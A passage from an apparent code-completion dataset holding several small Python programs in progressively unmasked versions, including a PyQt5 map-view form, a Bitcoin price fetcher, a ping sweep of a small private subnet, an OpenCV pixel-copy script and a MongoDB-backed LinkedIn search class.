text: str):\n self._message.text = text\n return self\n\n def attachments(self, attachments: List):\n self._message.attachments = attachments\n return self\n\n async def send(self):\n # Use dynamic module based on mailer driver\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-ids": [
6,
8,
9,
10,
15
]
}
|
[
6,
8,
9,
10,
15
] |
<|reserved_special_token_0|>
class Ui_MapGraphTab(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Ui_MapGraphTab(object):
def setupUi(self, MapGraphTab):
MapGraphTab.setObjectName('MapGraphTab')
MapGraphTab.resize(1150, 831)
MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))
MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')
self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)
self.gridLayout.setObjectName('gridLayout')
self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)
self.mapView.setUrl(QtCore.QUrl('about:blank'))
self.mapView.setObjectName('mapView')
self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)
self.label = QtWidgets.QLabel(MapGraphTab)
self.label.setMinimumSize(QtCore.QSize(1050, 0))
font = QtGui.QFont()
font.setFamily('Book Antiqua')
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName('label')
self.gridLayout.addWidget(self.label, 0, 0, 1, 2)
self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)
font = QtGui.QFont()
font.setFamily('Book Antiqua')
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.extractrMapBtn.setFont(font)
self.extractrMapBtn.setStyleSheet(
'background-color: rgb(255, 255, 255);')
self.extractrMapBtn.setObjectName('extractrMapBtn')
self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)
self.retranslateUi(MapGraphTab)
QtCore.QMetaObject.connectSlotsByName(MapGraphTab)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Ui_MapGraphTab(object):
def setupUi(self, MapGraphTab):
MapGraphTab.setObjectName('MapGraphTab')
MapGraphTab.resize(1150, 831)
MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))
MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')
self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)
self.gridLayout.setObjectName('gridLayout')
self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)
self.mapView.setUrl(QtCore.QUrl('about:blank'))
self.mapView.setObjectName('mapView')
self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)
self.label = QtWidgets.QLabel(MapGraphTab)
self.label.setMinimumSize(QtCore.QSize(1050, 0))
font = QtGui.QFont()
font.setFamily('Book Antiqua')
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName('label')
self.gridLayout.addWidget(self.label, 0, 0, 1, 2)
self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)
font = QtGui.QFont()
font.setFamily('Book Antiqua')
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.extractrMapBtn.setFont(font)
self.extractrMapBtn.setStyleSheet(
'background-color: rgb(255, 255, 255);')
self.extractrMapBtn.setObjectName('extractrMapBtn')
self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)
self.retranslateUi(MapGraphTab)
QtCore.QMetaObject.connectSlotsByName(MapGraphTab)
def retranslateUi(self, MapGraphTab):
_translate = QtCore.QCoreApplication.translate
MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))
self.label.setText(_translate('MapGraphTab', 'Map Graph'))
self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MapGraphTab(object):
def setupUi(self, MapGraphTab):
MapGraphTab.setObjectName('MapGraphTab')
MapGraphTab.resize(1150, 831)
MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))
MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')
self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)
self.gridLayout.setObjectName('gridLayout')
self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)
self.mapView.setUrl(QtCore.QUrl('about:blank'))
self.mapView.setObjectName('mapView')
self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)
self.label = QtWidgets.QLabel(MapGraphTab)
self.label.setMinimumSize(QtCore.QSize(1050, 0))
font = QtGui.QFont()
font.setFamily('Book Antiqua')
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName('label')
self.gridLayout.addWidget(self.label, 0, 0, 1, 2)
self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)
font = QtGui.QFont()
font.setFamily('Book Antiqua')
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.extractrMapBtn.setFont(font)
self.extractrMapBtn.setStyleSheet(
'background-color: rgb(255, 255, 255);')
self.extractrMapBtn.setObjectName('extractrMapBtn')
self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)
self.retranslateUi(MapGraphTab)
QtCore.QMetaObject.connectSlotsByName(MapGraphTab)
def retranslateUi(self, MapGraphTab):
_translate = QtCore.QCoreApplication.translate
MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))
self.label.setText(_translate('MapGraphTab', 'Map Graph'))
self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))
from PyQt5 import QtWebEngineWidgets
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mapGraph.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MapGraphTab(object):
def setupUi(self, MapGraphTab):
MapGraphTab.setObjectName("MapGraphTab")
MapGraphTab.resize(1150, 831)
MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))
MapGraphTab.setStyleSheet("background-color: rgb(255, 96, 117);")
self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)
self.gridLayout.setObjectName("gridLayout")
self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)
self.mapView.setUrl(QtCore.QUrl("about:blank"))
self.mapView.setObjectName("mapView")
self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)
self.label = QtWidgets.QLabel(MapGraphTab)
self.label.setMinimumSize(QtCore.QSize(1050, 0))
font = QtGui.QFont()
font.setFamily("Book Antiqua")
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 2)
self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)
font = QtGui.QFont()
font.setFamily("Book Antiqua")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.extractrMapBtn.setFont(font)
self.extractrMapBtn.setStyleSheet("background-color: rgb(255, 255, 255);")
self.extractrMapBtn.setObjectName("extractrMapBtn")
self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)
self.retranslateUi(MapGraphTab)
QtCore.QMetaObject.connectSlotsByName(MapGraphTab)
def retranslateUi(self, MapGraphTab):
_translate = QtCore.QCoreApplication.translate
MapGraphTab.setWindowTitle(_translate("MapGraphTab", "Map Graph"))
self.label.setText(_translate("MapGraphTab", "Map Graph"))
self.extractrMapBtn.setText(_translate("MapGraphTab", "Extract Video"))
from PyQt5 import QtWebEngineWidgets
|
flexible
|
{
"blob_id": "03a13037a9a102397c8be4d9f0f4c5e150965808",
"index": 8666,
"step-1": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))\n self.label.setText(_translate('MapGraphTab', 'Map Graph'))\n self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))\n\n\n<mask token>\n",
"step-4": "from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))\n self.label.setText(_translate('MapGraphTab', 'Map Graph'))\n self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))\n\n\nfrom PyQt5 import QtWebEngineWidgets\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'mapGraph.ui'\n#\n# Created by: PyQt5 UI code generator 5.9.2\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MapGraphTab(object):\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName(\"MapGraphTab\")\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet(\"background-color: rgb(255, 96, 117);\")\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl(\"about:blank\"))\n self.mapView.setObjectName(\"mapView\")\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily(\"Book Antiqua\")\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily(\"Book Antiqua\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.extractrMapBtn.setObjectName(\"extractrMapBtn\")\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate(\"MapGraphTab\", \"Map Graph\"))\n self.label.setText(_translate(\"MapGraphTab\", \"Map Graph\"))\n self.extractrMapBtn.setText(_translate(\"MapGraphTab\", \"Extract Video\"))\n\nfrom PyQt5 import QtWebEngineWidgets\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print
<|reserved_special_token_1|>
a = 'Hello, World!'
print
|
flexible
|
{
"blob_id": "b779cfc6d6456a370092bf1cfa5904c869b7466a",
"index": 9219,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint\n",
"step-3": "a = 'Hello, World!'\nprint\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import json
import requests
class Bitcoin:
coindesk = 'https://api.coindesk.com/v1/bpi/currentprice.json'
def __init__(self):
pass
def get_current_price(self, url=coindesk):
self.resp = requests.get(url)
if self.resp.status_code == 200:
return json.loads(self.resp.content.decode('utf-8'))
else:
return None
def float_price(self, json_response):
if json_response is not None:
rate = json_response['bpi']['EUR']['rate_float']
try:
return float(rate)
except:
return None
else:
return None
|
normal
|
{
"blob_id": "3bfe4021d5cf9bd24c0fb778b252bc04c6ac47ed",
"index": 1847,
"step-1": "<mask token>\n\n\nclass Bitcoin:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Bitcoin:\n <mask token>\n\n def __init__(self):\n pass\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Bitcoin:\n <mask token>\n\n def __init__(self):\n pass\n\n def get_current_price(self, url=coindesk):\n self.resp = requests.get(url)\n if self.resp.status_code == 200:\n return json.loads(self.resp.content.decode('utf-8'))\n else:\n return None\n\n def float_price(self, json_response):\n if json_response is not None:\n rate = json_response['bpi']['EUR']['rate_float']\n try:\n return float(rate)\n except:\n return None\n else:\n return None\n",
"step-4": "<mask token>\n\n\nclass Bitcoin:\n coindesk = 'https://api.coindesk.com/v1/bpi/currentprice.json'\n\n def __init__(self):\n pass\n\n def get_current_price(self, url=coindesk):\n self.resp = requests.get(url)\n if self.resp.status_code == 200:\n return json.loads(self.resp.content.decode('utf-8'))\n else:\n return None\n\n def float_price(self, json_response):\n if json_response is not None:\n rate = json_response['bpi']['EUR']['rate_float']\n try:\n return float(rate)\n except:\n return None\n else:\n return None\n",
"step-5": "import json\nimport requests\n\n\nclass Bitcoin:\n coindesk = 'https://api.coindesk.com/v1/bpi/currentprice.json'\n\n def __init__(self):\n pass\n\n def get_current_price(self, url=coindesk):\n self.resp = requests.get(url)\n if self.resp.status_code == 200:\n return json.loads(self.resp.content.decode('utf-8'))\n else:\n return None\n\n def float_price(self, json_response):\n if json_response is not None:\n rate = json_response['bpi']['EUR']['rate_float']\n try:\n return float(rate)\n except:\n return None\n else:\n return None\n",
"step-ids": [
1,
2,
4,
5,
6
]
}
|
[
1,
2,
4,
5,
6
] |
import ipaddress
import subprocess
from subprocess import Popen, PIPE
import time
ip_net = ipaddress.ip_network('192.168.0.100/30')
for i in ip_net.hosts():
# print(i)
host_add = str(i)
toping = subprocess.Popen(['ping', '-n', '3',host_add],stdout=PIPE)
output = toping.communicate()[0]
hostalive = toping.returncode
if hostalive == 0:
print(host_add,"is reachable")
else:
print(host_add,"is not reachable")
# print(output)
# time.sleep(3)
# if toping ==0:
# print(i, ' is alive')
# else:
# print(i,' is not alive')
|
normal
|
{
"blob_id": "414fb437783fcfb55f542f072aaf3a8bb02b441e",
"index": 8275,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in ip_net.hosts():\n host_add = str(i)\n toping = subprocess.Popen(['ping', '-n', '3', host_add], stdout=PIPE)\n output = toping.communicate()[0]\n hostalive = toping.returncode\n if hostalive == 0:\n print(host_add, 'is reachable')\n else:\n print(host_add, 'is not reachable')\n",
"step-3": "<mask token>\nip_net = ipaddress.ip_network('192.168.0.100/30')\nfor i in ip_net.hosts():\n host_add = str(i)\n toping = subprocess.Popen(['ping', '-n', '3', host_add], stdout=PIPE)\n output = toping.communicate()[0]\n hostalive = toping.returncode\n if hostalive == 0:\n print(host_add, 'is reachable')\n else:\n print(host_add, 'is not reachable')\n",
"step-4": "import ipaddress\nimport subprocess\nfrom subprocess import Popen, PIPE\nimport time\nip_net = ipaddress.ip_network('192.168.0.100/30')\nfor i in ip_net.hosts():\n host_add = str(i)\n toping = subprocess.Popen(['ping', '-n', '3', host_add], stdout=PIPE)\n output = toping.communicate()[0]\n hostalive = toping.returncode\n if hostalive == 0:\n print(host_add, 'is reachable')\n else:\n print(host_add, 'is not reachable')\n",
"step-5": "import ipaddress\r\nimport subprocess\r\nfrom subprocess import Popen, PIPE\r\nimport time\r\n\r\nip_net = ipaddress.ip_network('192.168.0.100/30')\r\nfor i in ip_net.hosts():\r\n # print(i)\r\n host_add = str(i)\r\n toping = subprocess.Popen(['ping', '-n', '3',host_add],stdout=PIPE)\r\n\r\n output = toping.communicate()[0]\r\n hostalive = toping.returncode\r\n if hostalive == 0:\r\n print(host_add,\"is reachable\")\r\n else:\r\n print(host_add,\"is not reachable\")\r\n # print(output)\r\n # time.sleep(3)\r\n # if toping ==0:\r\n # print(i, ' is alive')\r\n # else:\r\n # print(i,' is not alive')\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class Solution(object):
def smallestGoodBase(self, n):
"""
:type n: str
:rtype: str
"""
# k is the base and the representation is
# m bits of 1
# We then have from math
# (k**m - 1) / (k-1) = n
# m = log_k (n * k - n + 1)
# m needs to be integer
# we know that k = 2 m will be largest
m_max = int(math.ceil(math.log(1 + int(n), 2)))
for m in range(m_max, 1, -1):
# solve high order equation
# k**m - nk + n - 1 = 0
# Find k using newton approach
res = self.solve_equation(m, int(n))
if res != False:
return str(res)
# k**m - nk + n - 1 = 0
# TODO: Why newton approach always work here.
# Hard to prove they are always monotonic
def solve_equation(self, m, n):
k_l, k_h = 2, n - 1
while k_l <= k_h:
mid = (k_l + k_h) / 2
val = mid ** m - n * mid + n - 1
if val == 0:
return mid
elif val < 0:
k_l = mid + 1
else:
k_h = mid - 1
return False
|
normal
|
{
"blob_id": "de287d1bc644fdfd0f47bd8667580786b74444d0",
"index": 8863,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n <mask token>\n",
"step-3": "class Solution(object):\n <mask token>\n\n def solve_equation(self, m, n):\n k_l, k_h = 2, n - 1\n while k_l <= k_h:\n mid = (k_l + k_h) / 2\n val = mid ** m - n * mid + n - 1\n if val == 0:\n return mid\n elif val < 0:\n k_l = mid + 1\n else:\n k_h = mid - 1\n return False\n",
"step-4": "class Solution(object):\n\n def smallestGoodBase(self, n):\n \"\"\"\n :type n: str\n :rtype: str\n \"\"\"\n m_max = int(math.ceil(math.log(1 + int(n), 2)))\n for m in range(m_max, 1, -1):\n res = self.solve_equation(m, int(n))\n if res != False:\n return str(res)\n\n def solve_equation(self, m, n):\n k_l, k_h = 2, n - 1\n while k_l <= k_h:\n mid = (k_l + k_h) / 2\n val = mid ** m - n * mid + n - 1\n if val == 0:\n return mid\n elif val < 0:\n k_l = mid + 1\n else:\n k_h = mid - 1\n return False\n",
"step-5": "class Solution(object):\n def smallestGoodBase(self, n):\n \"\"\"\n :type n: str\n :rtype: str\n \"\"\"\n # k is the base and the representation is\n # m bits of 1\n # We then have from math\n # (k**m - 1) / (k-1) = n\n # m = log_k (n * k - n + 1)\n # m needs to be integer\n \n # we know that k = 2 m will be largest\n m_max = int(math.ceil(math.log(1 + int(n), 2)))\n for m in range(m_max, 1, -1):\n # solve high order equation\n # k**m - nk + n - 1 = 0\n \n # Find k using newton approach\n res = self.solve_equation(m, int(n))\n if res != False:\n return str(res)\n \n\n # k**m - nk + n - 1 = 0\n # TODO: Why newton approach always work here.\n # Hard to prove they are always monotonic\n def solve_equation(self, m, n):\n k_l, k_h = 2, n - 1\n while k_l <= k_h:\n mid = (k_l + k_h) / 2\n val = mid ** m - n * mid + n - 1 \n if val == 0:\n return mid\n elif val < 0:\n k_l = mid + 1\n else:\n k_h = mid - 1\n return False\n \n\n ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import random
import cv2
img = cv2.imread('assets/logo.jpg', -1)
print(img.shape) #3 channels, bgr
#look at the 257. row and pixel 400 --> has bgr values: [41 98 243]
print(img[257][400])
'''
# manipulate the first 100 rows, all columns, and randomize the 3 pixel values
# (rows, colums, pixels) where pixels: b,g,r
for i in range(100): #first 100 rows
for j in range(img.shape[1]): #all the colums
img[i][j] = [random.randint(0,255),random.randint(0,255),random.randint(0,255)]
cv2.imshow('modifiedImage', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
'''
#copy one part of the image and copy it somewhere else
#take the pixels from row 500 bis 700 und davon die colums 600:900
tag = img[500:700, 600:900] #part of the picture
#paste this on another location in the image; needs same dimeension/ size
img[100:300, 650:950] = tag
cv2.imshow('Image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "35e66e5e154f5cd70f187a1cde33cef71102e1a6",
"index": 6829,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ntag = img[500:700, 600:900]\nimg[100:300, 650:950] = tag\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n",
"step-4": "import random\nimport cv2\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape)\nprint(img[257][400])\n<mask token>\ntag = img[500:700, 600:900]\nimg[100:300, 650:950] = tag\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n",
"step-5": "import random\nimport cv2\n\nimg = cv2.imread('assets/logo.jpg', -1)\nprint(img.shape) #3 channels, bgr\n\n#look at the 257. row and pixel 400 --> has bgr values: [41 98 243]\nprint(img[257][400])\n\n'''\n# manipulate the first 100 rows, all columns, and randomize the 3 pixel values\n# (rows, colums, pixels) where pixels: b,g,r\nfor i in range(100): #first 100 rows\n for j in range(img.shape[1]): #all the colums\n img[i][j] = [random.randint(0,255),random.randint(0,255),random.randint(0,255)]\n\ncv2.imshow('modifiedImage', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n'''\n\n#copy one part of the image and copy it somewhere else\n#take the pixels from row 500 bis 700 und davon die colums 600:900\ntag = img[500:700, 600:900] #part of the picture\n\n#paste this on another location in the image; needs same dimeension/ size\nimg[100:300, 650:950] = tag\n\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pymongo import MongoClient
from modules.linkedinSearch import SearchClass
from config import Config
class LinkedinSearch:
def __init__(self):
self.client = MongoClient(Config.MONGO_URI)
db = self.client.linkedin_db
self.collection = db.search
self.dict = {}
self.obj = SearchClass()
def db_check(self, query):
r = self.obj.search(query)
print(r)
t = 0
for i in r['results']:
if self.collection.find_one({'userid': i['userid']}):
pass
else:
# print(i)
t += 1
self.collection.insert_one(i)
self.client.close()
print('no. of stored pages', t)
# self.loop.close()
results = self.db_fetch(query)
#
# # return {'results': m}
return {'data': results}
# ---------------------fetching total number of query pages from database----------------------------------------
def db_fetch(self, query):
self.collection.create_index([("name", "text")])
lst = []
cursor = self.collection.find(
{"$text": {"$search": query}},
{'score': {'$meta': "textScore"}}).sort([('score', {'$meta': "textScore"})])
total = cursor.count()
n = 0
for i in cursor:
# print(i)
i.pop('_id')
lst.append(i)
n += 1
print('fetched pages from db', len(lst))
# return {'results': lst,
# 'total': n}
return lst
if __name__ == '__main__':
obj = LinkedinSearch()
print(obj.db_check("mark"))
|
normal
|
{
"blob_id": "3e8860c22ff3092304df57aa7f5dbcb6ccda7dd8",
"index": 5249,
"step-1": "<mask token>\n\n\nclass LinkedinSearch:\n <mask token>\n <mask token>\n\n def db_fetch(self, query):\n self.collection.create_index([('name', 'text')])\n lst = []\n cursor = self.collection.find({'$text': {'$search': query}}, {\n 'score': {'$meta': 'textScore'}}).sort([('score', {'$meta':\n 'textScore'})])\n total = cursor.count()\n n = 0\n for i in cursor:\n i.pop('_id')\n lst.append(i)\n n += 1\n print('fetched pages from db', len(lst))\n return lst\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LinkedinSearch:\n\n def __init__(self):\n self.client = MongoClient(Config.MONGO_URI)\n db = self.client.linkedin_db\n self.collection = db.search\n self.dict = {}\n self.obj = SearchClass()\n\n def db_check(self, query):\n r = self.obj.search(query)\n print(r)\n t = 0\n for i in r['results']:\n if self.collection.find_one({'userid': i['userid']}):\n pass\n else:\n t += 1\n self.collection.insert_one(i)\n self.client.close()\n print('no. of stored pages', t)\n results = self.db_fetch(query)\n return {'data': results}\n\n def db_fetch(self, query):\n self.collection.create_index([('name', 'text')])\n lst = []\n cursor = self.collection.find({'$text': {'$search': query}}, {\n 'score': {'$meta': 'textScore'}}).sort([('score', {'$meta':\n 'textScore'})])\n total = cursor.count()\n n = 0\n for i in cursor:\n i.pop('_id')\n lst.append(i)\n n += 1\n print('fetched pages from db', len(lst))\n return lst\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass LinkedinSearch:\n\n def __init__(self):\n self.client = MongoClient(Config.MONGO_URI)\n db = self.client.linkedin_db\n self.collection = db.search\n self.dict = {}\n self.obj = SearchClass()\n\n def db_check(self, query):\n r = self.obj.search(query)\n print(r)\n t = 0\n for i in r['results']:\n if self.collection.find_one({'userid': i['userid']}):\n pass\n else:\n t += 1\n self.collection.insert_one(i)\n self.client.close()\n print('no. of stored pages', t)\n results = self.db_fetch(query)\n return {'data': results}\n\n def db_fetch(self, query):\n self.collection.create_index([('name', 'text')])\n lst = []\n cursor = self.collection.find({'$text': {'$search': query}}, {\n 'score': {'$meta': 'textScore'}}).sort([('score', {'$meta':\n 'textScore'})])\n total = cursor.count()\n n = 0\n for i in cursor:\n i.pop('_id')\n lst.append(i)\n n += 1\n print('fetched pages from db', len(lst))\n return lst\n\n\nif __name__ == '__main__':\n obj = 